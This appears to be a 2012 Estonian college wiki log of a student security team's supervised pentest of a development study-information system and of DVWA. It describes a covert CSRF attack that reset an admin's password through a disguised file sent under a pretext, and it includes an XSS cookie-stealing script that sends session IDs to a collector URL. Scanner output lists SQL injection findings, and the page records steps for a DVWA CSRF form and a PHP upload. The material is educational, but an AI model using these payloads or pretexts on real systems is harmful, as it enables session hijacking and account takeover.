Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47033</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47033"/>
		<updated>2012-03-30T11:36:46Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Väike upload tegevus, mis võiks olla teisiti */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
